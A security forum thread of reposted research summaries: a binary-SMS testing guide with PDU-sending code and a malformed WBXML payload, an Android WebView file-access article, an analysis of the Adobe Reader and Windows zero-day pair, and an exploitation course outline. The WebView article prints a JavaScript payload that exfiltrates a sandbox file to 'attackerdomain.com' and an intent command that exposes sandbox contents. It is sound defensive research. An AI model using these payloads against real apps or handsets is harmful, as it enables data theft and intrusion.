network. Private SMS test environment To inspect SMS PDUs on the air interface a GSM base station is required. One of the best known open source base stations is OpenBTS, for which there are many setup tutorials for many different platforms. In our experience of OpenBTS it is indeed quick to setup but it's PDU handling needs work. It has a Command Line Interface (CLI) for sending both types of SMS but we found the PDU validation routine to be buggy for Mobile Terminated (MT) SMS messages which is exactly what we're interested in. After spending a long time nailing down the validation issue (and judging by the developer's comments and try/catch blocks we weren't alone) we happened across YateBTS which we found to have better support for testing MT-SMS. YateBTS can be installed on a Raspberry Pi 3 which gives the advantage of having it in a small portable form so you can place it inside the faraday cage for example so it can be accessed by many users on a LAN. You should keep the distance between the radio and the host computer as short as possible and do not daisy chain USB cables as the clock requirements are so precise you will experience stability issues. Kit list All prices are approximate. A cellar or room with double concrete walls could be used instead of a faraday cage providing your licensing authority are satisfied it will suppress emissions sufficiently (>60dB). Twelve inch concrete blocks have 35dB of attenuation at 900MHz. 
Ettus USRP B200 with 2 900MHz antennas: £600 Ettus GPS disciplined oscillator (TCXO) with GPS antenna: £500 Ramsey STE3000 RF enclosure: £1500 Raspberry Pi 3: £35 YateBTS: Free Wireshark: Free Osmo-trx driver: Free Ettus UHD library: Free Total: £2635 Building Open source BTS tutorials age off quicker than a Gentoo kernel due to the fast moving world of open source GSM and the dynamic dependencies required. We recommend focusing on learning the standard and concepts rather than particular packages but if you want a recent tutorial, you'll find a comprehensive tutorial for an open source BTS (Yate) on a Pi here. OpenBTS and YateBTS don't prescribe hardware or drivers so you can use it with multiple radios, providing they support the precise timing requirements of a GSM base station which are for an error rate of 0.05 ppm. This is more relaxed for pico cells at 0.1ppm. If you attempt to stand up a BTS without a precision clock source you will find it is unstable. You may get lucky and get your handset to see the network and attach to it briefly at close range but it won't last and will quickly fall over once you commence testing. A precision clock is essential. The GPS unit we used requires an external GPS receive antenna and does take a while to acquire a fix (Green LED) initially. A key configuration change for using a low power PC like a Pi is the third party radio driver which must be defined within ../etc/yate/ybts.conf. We had success with the official Ettus UHD driver but opted for the ARM friendly osmo-trx transceiver compiled with UHD 003.010 defined as Path=./osmo-trx and homed at ../lib/yate/server/bts/osmo-trx Testing Understanding the many unique aspects of the GSM air interface is not necessary to perform SMS testing but having a basic understanding of paging will help. Getting your handset to attach initially is half the battle, after that the rest is quite straightforward and very much in the realm of computing not RF. The gsmtap PCAP output is an invaluable tool in testing your setup and monitoring traffic on the air interface. To use it, enter Yate's web UI and update the monitoring IP to your own, check the gsmtap box, then spin up wireshark on your external interface. This feature can be used remotely which is convenient for users on a LAN. The gsmtap UDP packets for both the uplink and downlink will be sent blindly to port 4729 on your host and will likely elicit ICMP port closed responses. A healthy BTS will be broadcasting data frames constantly on its Broadcast Channel (BCCH) and subscribers will be able to attach to it providing their International Mobile Subscriber Identifier (IMSI) is allowed under the access rules. When initiating an SMS, the first thing the BTS does is page the handset on the Common Control Channel (CCCH) to test for it's presence. The handset should respond in kind after which the BTS will send the SMS PDU(s) on the Standalone Dedicated Control Channel (SDCCH). In the screenshot below, a concatenated 3 part SMS has been sent over our YateBTS by subscriber 12345. Only when the final fragment arrives is it reassembled into a complete SMS. Each fragment is acknowledged separately which is helpful for debugging concatenation issues. 
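If you would rather script the capture than watch it in Wireshark, the same gsmtap feed can be picked up with a few lines of Python. A sketch assuming scapy is installed and that YateBTS is mirroring gsmtap to your host on UDP port 4729, as described above:

from scapy.all import sniff, UDP

def show_gsmtap(pkt):
    # YateBTS sends gsmtap frames blindly to UDP/4729; dump each one as hex
    if UDP in pkt and pkt[UDP].dport == 4729:
        frame = bytes(pkt[UDP].payload)
        print(len(frame), frame.hex())

sniff(filter="udp and port 4729", prn=show_gsmtap, store=False)

For interactive analysis, the Wireshark display filters below remain the quickest way to isolate specific traffic.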
Wireshark filters
Only GSM: gsmtap && !icmp
Only paging activity: gsmtap.chan_type == CCCH && !icmp
Only SMS (Uplink / Downlink): gsm_a.dtap.msg_sms_type == 0x01
Only SMS from originator 12345: gsm_sms.tp-oa == "12345"
Only SMS ack from subscriber: gsm_a.rp.msg_type == 0x02

To send a PDU with YateBTS you can either use the dedicated script in the web interface at /nib_web/custom_sms.php or the more flexible telnet interface on TCP port 5038. Both methods require the IMSI of the recipient, which you can find from the registered subscribers list or by monitoring handset registration and paging on the air interface. We wrapped the telnet interface with our own PHP script using the socket API like so:

// PHP
$cmd = "control custom_sms called=$imsi $type=rpdu";
$socket = fsockopen("localhost", "5038", $errno, $errstr);
fputs($socket, "$cmd\r\n");

With our SMS web API we were not only able to let other researchers on the LAN send PDUs but also de-skill the knowledge required to perform SMS testing. The PDU sent on the air interface looks different from the PDU sent over the public network because of differences in the SMS-DELIVER (BTS > MS) and SMS-SUBMIT (MS > BTS) formats. To learn more about PDUs see the PDU section.

Public SMS test environment
PDU testing doesn't have to be expensive. You can send custom PDUs using any GSM device on which you can issue AT modem commands. A practical solution is a 3G dongle such as the Huawei E3533 or even a basic development board such as the Adafruit FONA series. Using the £20 Huawei E3533 as an example, you will need to ensure the device is connected in GSM modem mode, not Ethernet adapter or mass storage etc. To do this with Linux, issue a usb_modeswitch command as follows:

usb_modeswitch -v 0x12d1 -p 0x1f01 -V 0x12d1 -P 0x14db -M "55534243123456780000000000000011063000000100010000000000000000"

More device-specific commands are available in the forum at http://www.draisberghof.de/usb_modeswitch/bb/

Once you have a /dev/ttyUSBx, connect to it with a serial console like minicom and issue the following Hayes AT commands:
AT+CMGF=0 to place the modem into PDU mode.
AT+CMGS=n to prepare to send a PDU of length n bytes, followed by the PDU itself in hexadecimal form. To obtain the length, take the total number of hexadecimal characters, divide it by 2 to get bytes, then subtract 8 bytes for the recipient's number.
Tip: Hit Ctrl-Z to send the PDU. Do not hit enter.

The serial commands are easily scripted using Python's serial library. Before firing up your Python interpreter, bear in mind your carrier's terms and conditions regarding automated sending of SMS messages. So long as you are in control of each message's transmission you should be ok. Here's a basic Python client for sending a PDU via a GSM modem (AT commands are terminated with \r\n, and the PDU is followed by Ctrl-Z, 0x1A, to submit it):

# Python
import serial
import time

# tty is the modem device (e.g. /dev/ttyUSB0), pdu is the hex-encoded PDU string
ser = serial.Serial(tty, 115200, timeout=5)
ser.write('AT\r\n')
if "OK" in ser.read(64):
    print "CONNECTED TO MODEM OK"
    ser.write("AT+CMGF=0\r\n")                        # PDU mode
    ser.write("AT+CMGS=%d\r\n" % ((len(pdu)/2)-8))    # length in bytes, minus recipient number
    time.sleep(1)
    ser.write('%s\x1a' % pdu)                         # Ctrl-Z submits the PDU
    print ser.read(64)
else:
    print "MODEM FAILURE"
ser.close()

Protocol Data Units (PDUs)
The GSM 03.40 standard describes Transfer Protocol Data Units (TPDUs), which are used to convey an SMS. The TPDU is used throughout the message's journey across the telecoms network. There are different types of SMS PDUs.
PDUs from the handset to the network are SMS-SUBMIT and could start with byte 0x01, PDUs from the network down to the handset are SMS-DELIVER and could start with byte 0x00 and are normally longer due to the addition of a 7 octet date service centre time stamp. The first byte is a bitmask of multiple flags and contains a lot of information. PDU encoding is complicated but thankfully there are many free online encoders and programming libraries like Python's smspdu to validate your PDU against the GSM 03.40 standard. Before jumping straight in and using one it's important you understand some key fields and the significant difference between DELIVER and SUBMIT PDUs as many online decoders only do SUBMIT and not DELIVER. We've tested lots and recommend Python's smspdu library. Example validation of a PDU: python -m smspdu [PDU] The Protocol Identifier (PID) field refers to the application layer protocol used. The default value 0x00 is used for plain short messages. Setting the PID to 0x64 would be a silent SMS known as a 'type 0' SMS which all handsets receive and must acknowledge without indicating its receipt to the user. As previously mentioned, this has been used by law enforcement to actively 'ping' a handset on a network. User data headers and concatenation When you want to target an application on a phone you need to define the destination port within the User Data Header (UDH) which sits between the PDU header and User Data (UD) and is declared early on with the User Data Header Indicator (UDHI) flag in the first octet. The UDH is also where Concatenated SMS (C-SMS) fragments are described. SMS allows for large (binary) payloads to be chunked up and sent as separate messages, not necessarily in sequence. This allows for up to 35,700 bytes of custom data to be sent to an application on a handset as 255 texts (Warning: You get billed per SMS). To chunk up a large message, it must first be split up into user data fragments not more than 140 octets each. A concatenated fragment is indicated via the UDHI flag in the first byte which indicates the first few bytes of the UD are fragment information which is used to reassemble the fragments later in order. Each fragment would be sent, preceded by the SMSC header, destination number, and the Protocol Identifier (PID) and Data Coding scheme (DCS) bytes. The fragment header contains the fragment count, a unique byte which serves as a batch identifier for all the fragments as well as the total number of fragments. Example UDH declaring 16 bit port addressing AND concatenation: 0A050B8457320003FF0201 0A: UDH length minus length field: 10 05: 16 bit application port addressing (Next four octets) 0B84: Destination port: 2948 (WAP push) 5732: Source port: 1664 00: Concatenated SMS 03: Information Element length for C-SMS section: 3 FF: Unique message identifier: 255 02: Fragments total: 2 01: This fragment: 1 For more UDH options see the 3GPP 23.040 standard. Hello World! SMS-SUBMIT PDU This PDU to MSISDN +441234567890 has the 'immediate display' flag set so will pop up as a flash SMS on the recipient's handset: 01000C9144214365870900000CC8329BFD065DDF72363904 Bear in mind that data encoding varies between sections. Some sections are special bit-masks, some are GSM 7 bit encoded and some are just plain old hexadecimal. 
01: SMS-SUBMIT with default flags (Bitmask) 00: Message type 0 (bits 0-1)Reject duplicates flag set (bit 2) (Bitmask) 0C: Recipient length 12 digits (0x0C) 91: International ISDN/Telephone numbering plan (Bitmask) 442143658709: Recipient MSISDN (+441234567890) (GSM 7 bit encoding) 0000: Protocol identifier 0: Plain old SMS, Data Coding Scheme 0: Flash message (Bit mask) CC8329BFD065DDF72363904: User data: Hello World! (GSM 7 bit encoding) GSM interfaces on phones don't have firewalls With an Android phone you would see the following activity in the log when an SMS PDU is received. This shows the Radio Interface Layer (RIL) notifying the kernel of an incoming unsolicited PDU of length 168 (21 bytes). The full PDU is written to a SQLITE database, an automatic acknowledgement is sent (SMS-DELIVER-ACK) back to the network and finally the PDU is delivered to Android's privileged SMS receiver for onward processing, in this case to the message store although it could be routed to a listening application if a destination port is specified in the UDH. The only check is within the SmsHandler() which checks if SMS messages are allowed. There is no concept of packet inspection or port filters like an IP firewall. adb logcat -b radio I/RILC ( 2139): RIL_SOCKET_1 UNSOLICITED: UNSOL_RESPONSE_NEW_SMS length:168D/RILJ ( 2988): [UNSL]< UNSOL_RESPONSE_NEW_SMS [SUB0]D/GsmInboundSmsHandler( 2988): IdleState.processMessage:1D/GsmInboundSmsHandler( 2988): Idle state processing message type 1D/GsmInboundSmsHandler( 2988): acquired wakelock, leaving Idle stateD/GsmInboundSmsHandler( 2988): entering Delivering stateD/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:1D/GsmInboundSmsHandler( 2988): isSMSBlocked=falseD/GsmInboundSmsHandler( 2988): URI of new row -> content://raw/1D/RILJ ( 2988): [9382]> SMS_ACKNOWLEDGE true 0 [SUB0]D/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:2D/RILC ( 2139): SOCKET RIL_SOCKET_1 REQUEST: SMS_ACKNOWLEDGE length:20D/GsmInboundSmsHandler( 2988): Delivering SMS to: com.android.mms com.android.mms.transaction.PrivilegedSmsReceiver Targeting port 2948 with random data In this example, an SMS-SUBMIT containing 1000 characters of malformed WBXML has been concatenated as 7 fragments and targeted at a the WAP push application listening on port 2948.Because of the port number, an assumption about the data type of the payload is made (WBXML). This could be any binary data addressed to any port. PDU bytes: 41000C9144214365870900009B0B05040B8457320003FF0201C2E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E17018 41: SMS-SUBMIT with a user data header (Bitmask), Reject duplicates flag set (bit 2), User Data Header flag set (bit 3) 00: Message type 0 (bits 0-1) Immediate display 0C: Recipient length 12 digits (0x0C) 91: International ISDN/Telephone numbering plan (Bitmask) 442143658709: Recipient MSISDN (+441234567890 encoded as 7-bit ASCII) 0000: PID: 0, DCS: 0 9B: User data length (including UDH): 155 0B05040B8457320003FF0201:User Data Header (UDH). 
Length: 0x0B 16 bit port addressing: 0x05 Four octets long: 0x04 Destination port: 0x0B84 Source port: 0x5732 Concatenated SMS: 0x00 Three octets long: 0x03 Sequence identifier: 0xFF Total fragments: 0x02 This fragment: 0x01 C2E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E17018:User Data. Malformed WBXML composed of repeat sequence of letter 'a'. Conclusion SMS is a weak link in a handset's security. With it you can interact, remotely, with an application on someone's phone when the phone is not connected to the internet. Significantly it has no firewall so bad packets are always forwarded. Despite being an old specification it has received much less scrutiny than Internet Protocol for example and many applications (and non-conventional devices now) handle SMS PDUs with a greater level of trust than they afford IP packets for comparison. In our next SMS blog we'll employ these concepts to attack the application layer on a phone remotely... Contact and Follow-up Alex is a senior researcher based in Context's Cheltenham office. He has over 15 years' experience of engineering and analysing RF systems and protocols and specialises in electronic warfare and RF propagation. See the contact page for how to get in touch. Sursa: https://www.contextis.com/blog/binary-sms-the-old-backdoor-to-your-new-thing
  17. HOW TO DETERMINE THE LOCATION OF A MOBILE SUBSCRIBER Sergey Puzankov Mobile networks allow for some rather specific attacks. In this article, I will consider a real-time attack that detects the cell in which a subscriber is located. I cannot express the method's accuracy in more familiar units of distance, because cell coverage areas vary greatly with the terrain. In a densely built-up urban area, a cell could cover several hundred meters; on an intercity highway in open country, a cell might cover several kilometers. Download: https://www.ptsecurity.com/upload/iblock/8c0/8c065c70984c93d3001234ed6e6d865b.pdf
  18. Prototype pollution attack Abstract Prototype pollution is a term that was coined many years ago in the JavaScript community to designate libraries that added extension methods to the prototype of base objects like "Object", "String" or "Function". This was very rapidly considered a bad practice as it introduced unexpected behavior in applications. In this presentation, we will analyze the problem of prototype pollution from a different angle. What if an attacker could pollute the prototype of the base object with his own value? What APIs allow such pollution? What can be done with it? Paper Link to paper Slides Link to slides Sursa: https://github.com/HoLyVieR/prototype-pollution-nsec18
  19. How do we Stop Spilling the Beans Across Origins? A primer on web attacks via cross-origin information leaks and speculative execution aaj@gxxgle.com, mkwst@gxxgle.com Intro Browsers do their best to enforce a hard security boundary on an origin-by-origin basis. To vastly oversimplify, applications hosted at distinct origins must not be able to read each other's data or take action on each other’s behalf in the absence of explicit cooperation. Generally speaking, browsers have done a reasonably good job at this; bugs crop up from time to time, but they're well-understood to be bugs by browser vendors and developers, and they're addressed promptly. The web platform, however, is designed to encourage both cross-origin communication and inclusion. These design decisions weaken the borders that browsers place around origins, creating opportunities for side-channel attacks (pixel perfect, resource timing, etc.) and server-side confusion about the provenance of requests (CSRF, cross-site search). Spectre and related attacks based on speculative execution make the problem worse by allowing attackers to read more memory than they're supposed to, which may contain sensitive cross-origin responses fetched by documents in the same process. Spectre is a powerful attack technique, but it should be seen as a (large) iterative improvement over the platform's existing side-channels. This document reviews the known classes of cross-origin information leakage, and uses this categorization to evaluate some of the mitigations that have recently been proposed ( CORB , From-Origin , Sec-Metadata / Sec-Site , SameSite cookies and Cross-Origin-Isolate ). We attempt to survey their applicability to each class of attack, and to evaluate developers' ability to deploy them properly in real-world applications. Ideally, we'll be able to settle on mitigation techniques which are both widely deployable, and broadly scoped. Sursa: https://www.arturjanc.com/cross-origin-infoleaks.pdf
  20. Reviewing Android Webviews fileAccess attack vectors.
May 15, 2018
Introduction
WebViews are a crucial part of many mobile applications and there are some security aspects that need to be taken into account when using them. File access is one of those aspects. For the implementation of some checks in our security tool Droidstatx, I've spent some time understanding all the details and noticed that not all attack vectors are very clear, especially in their requirements.
WebView file access is enabled by default. Since API 3 (Cupcake 1.5) the method setAllowFileAccess() is available for explicitly enabling or disabling it. A WebView with file access enabled will be able to access all the same files as the embedding application, such as the application sandbox (located in /data/data/<package_name>), /etc, /sdcard, among others. Above API 19 (KitKat 4.4 - 4.4.4), the app will need the android.permission.READ_EXTERNAL_STORAGE permission. The WebView needs to use a File URL Scheme, e.g., file://path/file, to access the file. Another important detail is that WebViews have Javascript disabled by default. The method setJavaScriptEnabled() is available for explicitly enabling or disabling it.
Before going into details regarding the type of attack vectors that are made possible with file access, one needs to be aware of another concept, Same Origin Policy (SOP):
"A web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, host name, and port number." (from https://en.wikipedia.org/wiki/Same-origin_policy)
As an example, the URLs https://www.integrity.pt and file://etc/hosts do not have the same origin since they won't match in:
Scheme: HTTPS vs file
Authority: www.integrity.pt vs etc/hosts
This means that a file request in the context of content loaded from https://www.integrity.pt will be considered a Cross Origin Request (COR).
Attack Vectors
So we have a WebView with file access. Now what? As an attacker we want data exfiltration, and this is what motivated me to write this article, because there are details that can invalidate this type of attack.
Scenario 1: App with WebView that loads resources which the attacker is able to intercept and manipulate. Javascript enabled.
In this scenario, an attacker is able to intercept the communication of the app and is able to manipulate the content. Our goal is to exfiltrate content from the app, so our best option is to use Javascript to do so. Using an XMLHttpRequest seems the best way to do that. The attacker can try and replace the content returned to the app with a Javascript payload that would seemingly allow them to exfiltrate files:
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    window.location.replace('https://attackerdomain.com/?exfiltrated='+xhr.responseText);
  }
}
xhr.open('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true);
xhr.send(null);
The attacker will be able to see the HTTP request but without exfiltrated data. If we look into the system logs we discover why.
05-09 12:38:59.306 27768 27768 I chromium: [INFO:CONSOLE(20)] "Failed to load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt: Cross origin requests are only supported for protocol schemes: http, data, chrome, https.", source: https://labs.integrity.pt/ (20)
On earlier API versions like 15 (Ice Cream Sandwich 4.0.3 - 4.0.4) a similar error is returned:
Console: XMLHttpRequest cannot load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt. Cross origin requests are only supported for HTTP. null:1
Console: Uncaught Error: NETWORK_ERR: XMLHttpRequest Exception 101 https://labs.integrity.pt/:39
So even with file access enabled in the WebView, because the file scheme request is considered a Cross Origin Request and hence disallowed, the attacker will not be able to exfiltrate files this way.
Scenario 2: App with WebView that loads local HTML files via file scheme with external resources which the attacker is able to intercept and manipulate. Javascript enabled.
In this scenario, the HTML files are stored locally in the APK and are loaded via the file scheme, but some resources are loaded externally. There is a very important property called UniversalAccessFromFileURLs that allows SOP bypass. This property indicates whether Javascript running in the context of a file scheme can access content from any origin. This property is enabled by default below API 16 (Jelly Bean 4.1.x) and there is no way to disable it on those API levels [1]. In API 16 (Jelly Bean 4.1.x) and afterwards the property is disabled by default. The method setAllowUniversalAccessFromFileURLs() was also made available to explicitly enable or disable this feature.
Using the same Javascript payload, the attack will succeed on devices running API 15 and below, or in apps that explicitly enable the property using the method setAllowUniversalAccessFromFileURLs(). The attack succeeds because the app is running Javascript in the context of an HTML file loaded with a file scheme and the UniversalAccessFromFileURLs property is enabled, allowing SOP bypass.
Scenario 3: App with exported component that opens URLs via Intent. Backup disabled. Access to External Storage.
In this scenario, the app has an exported activity that receives URLs via Intents and opens the respective URL. This is very common in apps that are using Deep Links. When intent-filters are not correctly implemented, this can cause security issues. The app also has Backup disabled, preventing an attacker from obtaining access to the app's sandbox content via the backup file. Here the attack vectors are a bit trickier and more far-fetched, but still possible.
Scenario 3 - Physical Attack
One possible attack vector is someone who has physical access to an unlocked device, already knows in advance the structure of the vulnerable app (consider a hypothetical well-known app with a large user base), and session cookies or plaintext credentials are stored in the app's sandbox. The attacker can install a custom app sending a targeted Intent for the file with sensitive information, or install a terminal emulator from Google Play and type in the following command:
am start -n pt.integrity.labs.webview_intents/.ExportedActivity --es url "file:///data/data/pt.integrity.labs.webview_intents/files/sandbox_file.txt"
This will trigger the vulnerable app and the WebView is going to show the content of the sensitive file on the screen.
Without rooting the device it is possible to obtain access to the content of the app's sandbox.
Scenario 3 - Malicious App
This attack requires that the vulnerable app is running on a device below API 16, or that the app has explicitly enabled UniversalAccessFromFileURLs. An attacker lures the user into installing a malicious app that only needs the android.permission.INTERNET and android.permission.READ_EXTERNAL_STORAGE permissions. When started, the malicious app creates an HTML file in the external storage with a Javascript payload identical to the one used in scenarios 1 and 2. Afterwards, it sends an Intent to the vulnerable app containing the URL of the local HTML (previously created in the external storage). This will allow it to exfiltrate the information from inside the vulnerable app's sandbox like in scenario 2.
Test Apps
I've created the apps for all scenarios so you can play around and test this for yourselves.
Scenario 1 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_remote_scenario1.apk
Scenario 2 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_local_scenario2.apk
Scenario 3 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3.apk
Scenario 3 Exploit App - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3_exploit.apk
Note 1: All apps have a broken TLS implementation so it's easier to intercept the communication. If using Burp Suite, for scenario 2, ensure that you adjust the Intercept Client Requests rules so that you can intercept Javascript content.
Note 2: While exploring the vulnerability in Scenarios 2 and 3 (both vulnerable app and exploit) you will need to clear the data (Settings->Apps->App->Clear Data) when trying to repeat the attack.
Note 3: In Scenario 3 Malicious App, start the vulnerable app first and only then run the exploit app.
Conclusion
WebViews with file access enabled can have a big impact on a particular application's security but, by itself, a WebView with file access enabled does not guarantee a practical way to exfiltrate files from the system. For the attack to work it is required that the app is running on a device with API level < 16 and/or the app developer improperly used the Android platform as demonstrated in some of the scenarios above. These were the attack vectors that I could identify, but if I missed a particular one, I would love to discuss it and add it here. Ping me at https://twitter.com/clviper.
Recommendations:
Ensure that all external resources loaded by a WebView are using TLS and the app has a correct TLS implementation.
Ensure that all exported components that might need to receive intents and trigger a WebView to open that URL correctly filter the allowed URIs by using intent-filters and a data element.
Ensure that all WebViews explicitly disable file access when not a requirement by using the method setAllowFileAccess().
In API Level >= 16, when not a requirement, ensure that no WebView enables UniversalAccessFromFileURLs by using the method setAllowUniversalAccessFromFileURLs().
References https://en.wikipedia.org/wiki/Same-origin_policy https://source.android.com/setup/start/build-numbers https://developer.android.com/reference/android/webkit/WebView https://developer.android.com/reference/android/webkit/WebSettings https://developer.android.com/guide/components/intents-filters https://developer.android.com/guide/topics/manifest/data-element https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-webview-protocol-handlers Notes [1] Currently the Android developer documentation has the following paragraph: To prevent possible violation of same domain policy when targeting ICE_CREAM_SANDWICH_MR1 and earlier, you should explicitly set this value to false. I’ve opened an issue on google issue tracker, since this paragraph needs to be adjusted. The public method setAllowUniversalAccessFromFileURLs() was only implemented in API 16, so it is not possible to use this method in API 15 (ICE_CREAM_SANDWICH_MR1) and earlier. Thank you Special thank you to pmsac and morisson for the post review. Written by Cláudio André Sursa: https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/
  21. A tale of two zero-days Double zero-day vulnerabilities fused into one. A mysterious sample enables attackers to execute arbitrary code with the highest privileges on intended targets Anton Cherepanov 15 May 2018 - 02:58PM Share Late in March 2018, ESET researchers identified an interesting malicious PDF sample. A closer look revealed that the sample exploits two previously unknown vulnerabilities: a remote-code execution vulnerability in Adobe Reader and a privilege escalation vulnerability in Microsoft Windows. The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year. Once the PDF sample was discovered, ESET contacted and worked together with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs. Patches and advisories from Adobe and Microsoft are available here: APSB18-09 CVE-2018-8120 The affected product versions are the following: Acrobat DC (2018.011.20038 and earlier versions) Acrobat Reader DC (2018.011.20038 and earlier versions ) Acrobat 2017 (011.30079 and earlier versions) Acrobat Reader DC 2017 (2017.011.30079 and earlier versions) Acrobat DC (Classic 2015) (2015.006.30417 and earlier versions) Acrobat Reader DC (Classic 2015) (2015.006.30417 and earlier versions) Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 This blog covers technical details of the malicious sample and the vulnerabilities it exploited. Introduction PDF (Portable Document Format) is a file format for electronic documents and as with other popular document formats, it can be used by attackers to deliver malware to a victim’s computer. In order to execute their own malicious code, attackers have to find and exploit vulnerabilities in PDF viewer software. There are several PDF viewers; one very popular viewer is Adobe Reader. The Adobe Reader software implements a security feature called a sandbox, also known in the viewer as Protected Mode. The detailed technical description of the sandbox implementation was published on Adobe’s blog pages in four parts (Part 1, Part 2, Part 3, Part 4). The sandbox makes the exploitation process harder: even if code execution is achieved, the attacker still would have to bypass the sandbox’s protections in order to compromise the computer running Adobe Reader. Usually, sandbox bypass is achieved by exploiting a vulnerability in the operating system itself. This is a rare case when the attackers were able to find vulnerabilities and write exploits for the Adobe Reader software and the operating system. CVE-2018-4990 – RCE in Adobe Reader The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed. At the beginning of exploitation, the JavaScript code starts to manipulate the Button1 object. 
This object contains a specially crafted JPEG2000 image, which triggers a double-free vulnerability in Adobe Reader. Figure 1. JavaScript code that manipulates the Button1 object The JavaScript uses heap-spray techniques in order to corrupt internal data structures. After all these manipulations the attackers achieve their main goal: read and write memory access from their JavaScript code. Figure 2. JavaScript code used for reading and writing memory Using these two primitives, the attacker locates the memory address of the EScript.api plugin, which is the Adobe JavaScript engine. Using assembly instructions (ROP gadgets) from that module, the malicious JavaScript sets up a ROP chain that would lead to the execution of native shellcode. Figure 3. Malicious JavaScript that builds a ROP chain As the final step, the shellcode initializes a PE file embedded in the PDF and passes execution to it. CVE-2018-8120 – Privilege escalation in Microsoft Windows After having exploited the Adobe Reader vulnerability, the attacker has to break the sandbox. This is exactly the purpose of the second exploit we are discussing. The root cause of this previously unknown vulnerability is located in the NtUserSetImeInfoEx function of the win32k Windows kernel component. Specifically, the SetImeInfoEx subroutine of NtUserSetImeInfoEx does not validate a data pointer, allowing a NULL pointer dereference. Figure 4. Disassembled SetImeInfoEx routine As is evident in Figure 4, the SetImeInfoEx function expects a pointer to an initialized WINDOWSTATION object as the first argument. The spklList could be equal to zero if the attacker creates a new window station object and assigns it to the current process in user-mode. Thus, by mapping the NULL page and setting a pointer to offset 0x2C, the attacker can leverage this vulnerability to write to an arbitrary address in the kernel space. It should be noted that since Windows 8, a user process is not allowed to map the NULL page. Since the attacker has arbitrary write primitive they could use different techniques, but in this case, the attacker chooses to use a technique described by Ivanlef0u and Mateusz “j00ru” Jurczyk and Gynvael Coldwin. The attacker sets up a call gate to Ring 0 by rewriting the Global Descriptor Table (GDT). To do so an attacker gets the address of the original GDT using the SGDT assembly instruction, constructs their own table and then rewrites the original one using the above-mentioned vulnerability. Then the exploit uses the CALL FAR instruction to perform an inter-privilege level call. Figure 5. The disassembled CALL FAR instruction Once the code is executed in kernel mode, the exploit replaces the token of the current process with the system token. Conclusion Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages. Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing. Indicators of Compromise (IoC) ESET detection names JS/Exploit.Pdfka.QNV trojan Win32/Exploit.CVE-2018-8120.A trojan SHA-1 hashes C82CFEAD292EECA601D3CF82C8C5340CB579D1C6 0D3F335CCCA4575593054446F5F219EBA6CD93FE Anton Cherepanov 15 May 2018 - 02:58PM Sursa: https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/
  22. Binary Exploitation
Any Doubt...? Let's Discuss
Introduction
I am quite passionate about exploiting binary files. The first time I came across a buffer overflow (a simple exploitation technique), I was not able to reproduce it with the same copy of code on my system. The reason was that there was no consolidated document to guide me thoroughly through writing a working exploit payload for the program when the system changes. There are also very few descriptive blogs/tutorials that helped me exploit a given binary. So I have put together a consolidation of modern exploitation techniques (in the form of a tutorial) that will allow you to understand exploitation from scratch. I will be using a Vagrantfile to set up the system on VirtualBox. To do the same on your system, run:
vagrant up
vagrant ssh
Topics
Lecture 1. Memory layout of a C program. ELF binaries. Overview of the stack during a function call. Assembly code for the function call and return. Concept of $ebp and $esp. Executable memory.
Lecture 1.5. How does Linux find binary utilities? Simple exploit using the Linux $PATH variable.
Lecture 2. What are stack overflows? ASLR (basics), avoiding stack protection. Shellcodes. Buffer overflow: changing control of the program to return to some other function. Shellcode injection in the buffer and spawning a shell.
Lecture 3. Shellcode injection with ASLR enabled. Environment variables.
Lecture 3.5. Return to libc attacks. Spawning a shell with a non-executable stack. Stack organization in the case of a ret2libc attack.
Lecture 4. This folder contains a set of questions for exploiting binaries using the concepts that we have learned so far.
Lecture 5. What is a format string vulnerability? Seeing the content of the stack. Writing onto the stack. Writing to an arbitrary memory location.
Lecture 6. GOT. Overriding a GOT entry. Spawning a shell with a format string vulnerability.
Sursa: https://github.com/r0hi7/BinExp
  23. Escalating privileges with ACLs in Active Directory
Posted on April 26, 2018 by rindertkramer
Researched and written by Rindert Kramer and Dirk-jan Mollema
Introduction
